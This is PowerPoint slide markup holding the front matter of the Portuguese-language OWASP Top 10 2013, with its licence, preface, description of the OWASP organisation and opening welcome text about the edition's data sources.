        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="8072478"/>
          <a:ext cx="6858000" cy="1071522"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="330558">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0" smtClean="0"/>
                        <a:t>Copyright e Licença</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="7362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smtClean="0"/>
                        <a:t>Copyright © 2003 – 2013 The OWASP Foundation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sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Este documento é publicado sob a licença Creative Commons Attribution ShareAlike 3.0. Para qualquer tipo de reutilização ou distribuição, os termos deste trabalho deverão ser informados.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="1371600"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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="8517890"/>
            <a:ext cx="1046163" cy="374650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Table 9"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="587805544"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1144986"/>
          <a:ext cx="3352800" cy="6872728"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800"/>
              </a:tblGrid>
              <a:tr h="380488">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prefácio</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1600" b="1" kern="1200" noProof="0" dirty="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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="63993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BR"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sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>O software inseguro está debilitando nossa infraestrutura financeira, de saúde, de defesa, de energia e outras infraestruturas críticas. À medida que nossa infraestrutura digital fica cada vez mais complexa e interligada, a dificuldade em obter segurança em aplicações aumenta exponencialmente. Não podemos mais tolerar os problemas de segurança relativamente simples, como os apresentados nesta edição do OWASP Top 10.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="pt-BR"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sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>O Top 10 tem como objetivo a sensibilização sobre segurança em aplicações através da identificação de alguns dos riscos mais críticos enfrentados pelas organizações. O projeto Top 10 é referenciado por muitas normas, livros, ferramentas e organizações, incluindo MITRE, PCI DSS, DISA, FTC, e </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>muitas outras</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Esta versão do projeto Top 10 marca o décimo aniversário dessa sensibilização. O OWASP Top 10 foi lançado inicialmente em 2003, tendo pequenas atualizações em 2004 e em 2007. A versão de 2010 foi reformulada para priorizar por risco, não somente por prevalência. A versão 2013 segue essa mesma abordagem. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="pt-BR"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sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>A OWASP encoraja a utilização do Top 10 para que as organizações </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>comecem</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> com segurança em suas aplicações. Os desenvolvedores podem aprender com os erros de outras organizações. Os executivos devem começar a pensar em como gerenciar o risco que as aplicações de software criam em suas empresas.</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pt-BR" sz="1000" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>A longo prazo, encorajamos a criação de um programa de segurança em aplicações compatível com a cultura e tecnologia da organização. Estes programas podem existir em qualquer tamanho e forma, e deve-se evitar seguir apenas o que um determinado modelo prescreve. Ao invés disso, deve-se aproveitar os pontos fortes da organização para quantificar e determinar o que funciona para a mesma.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="pt-BR"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sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Desejamos que o OWASP Top 10 seja útil em seus esforços de segurança em aplicações. Não deixe de contatar a OWASP com suas perguntas, comentários e outras ideias, seja publicamente na </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>owasp-topten</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>@lists.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
                        <a:t> ou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> de forma privada para </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id=""/>
                        </a:rPr>
                        <a:t>dave.wichers@owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>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797857703"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="1143000"/>
          <a:ext cx="3429000" cy="6874319"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="382079">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Sobre a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1600" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1600" b="1" noProof="0" dirty="0">
                        <a:latin typeface="+mj-lt"/>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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="63997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BR" sz="100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sz="1000" i="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Open Web Application Security Project</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> (OWASP) é uma comunidade aberta, dedicada a capacitar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> as organizações a desenvolver, adquirir e manter aplicações confiáveis. No </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>OWASP se pode encontrar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>, grátis e de forma aberta...</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Normas e ferramentas de segurança em aplicações</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Livros completos sobre testes de segurança, desenvolvimento de código seguro e revisão de segurança de código </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Normas e bibliotecas de controles de segurança </a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Capítulos locais do OWASP pelo mundo</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Pesquisas última</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> geração</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Conferências</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t> do OWASP pelo mundo</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Listas de discussão.</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="100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sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Saiba mais em: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" noProof="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pt-BR" sz="100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sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Todos as</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> ferramentas, documentos, fóruns e capítulos do OWASP são grátis e abertos a todos os interessados em aperfeiçoar a segurança em aplicações. Promovemos a abordagem da segurança em aplicações como um problema de pessoas, processos e tecnologia, porque as abordagens mais eficazes em segurança de aplicações requerem melhorias nestas áreas. </a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="100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pt-BR" sz="100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sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A OWASP é um novo tipo de organização. O fato</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> de ser livre de pressões comerciais permite fornecer informação de segurança de aplicações imparcial, prática e de custo eficiente.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A OWASP não é filiada a nenhuma</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> empresa de tecnologia, apesar de apoiar o uso de tecnologia de segurança comercial.  Da mesma forma que muitos projetos de software de código aberto, a OWASP produz vários tipos de materiais de maneira colaborativa e aberta. </a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="100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pt-BR" sz="100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sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>A Fundação</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>OWASP é uma entidade sem fins lucrativos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> que garante o sucesso do projeto a longo prazo. Quase todos os associados à OWASP são voluntários, incluindo a Direção da OWASP, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>os Comitês</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> Globais, os Líderes dos Capítulos, os Líderes de Projetos e os membros dos projetos. Apoiamos a pesquisa inovadora em segurança através de bolsas e infraestrutura. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Junte-se a nós!</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>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ustDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12901459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410299123"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="2377440"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Bem-vindo</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:latin typeface="+mj-lt"/>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rgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="19711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Bem-vindo ao OWASP Top 10 2013! Esta atualização amplia uma das categorias da versão 2010 para ser mais abrangente, incluindo vulnerabilidades</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> importantes, comuns, e </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>reordena outras com base na mudança de dados de prevalência</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Ele também traz a segurança de componentes para o centro das atenções criando uma categoria específica para este risco, tirando-o da obscuridade das letras miúdas do risco A6 de 2010: Configuração Incorreta de Segurança.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>O OWASP Top 10 para 2013 é baseado em 8 conjuntos de dados de 7 empresas </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>que se especializam em segurança de aplicações</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, incluindo 4 consultorias and 3 fornecedores de ferramenta/Software as a Service (1 estática, 1 dinâmica, and 1 com ambas) . Estes dados abrangem mais de 500.000 vulnerabilidades </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>em centenas de organizações e milhares de aplicações</a:t>
                      </a:r>
